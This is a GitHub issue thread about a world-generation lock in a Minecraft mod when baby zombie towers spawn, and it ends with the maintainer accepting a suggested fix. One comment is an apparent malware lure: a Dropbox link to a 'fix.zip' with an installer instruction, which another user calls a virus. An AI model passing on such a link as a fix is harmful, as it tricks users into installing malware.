### ISSUE TITLE
Worldgen Lock when baby tower spawning enabled

### ISSUE THREAD

**Issue by Linguardium** [sf-inc/sihywtcamd#59]
I expect the issue is here:

https://github.com/sf-inc/sihywtcamd/blob/5dcc05be356bd3e6bf741b0287723b1f13f61fe4/src/main/java/com/github/galatynf/sihywtcamd/mixin/zombie/ZombieLivingMixin.java#L57

likely related to #38 
[crash-2024-08-25_22.58.31-server (2).txt](https://github.com/user-attachments/files/16742652/crash-2024-08-25_22.58.31-server.2.txt)

initialize is called on the new baby, which would trigger a potential mounting of a chicken, which could cause the same dismount code. ideally you should pass a ZombieEntity.ZombieData. no need to set the baby state as its set via the entitydata you feed in

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Linguardium** [comment]
>  In the installer menu, select "gcc."

nobody download this, its a virus

**Comment by charlyb01** [comment]
Hi, thanks for the report! You're totally right, I'm doing a safety check for the first baby zombie only, but the other ones can also try to mount chickens first. I will pass a ZombieData as you suggest, this seems to be the perfect fix
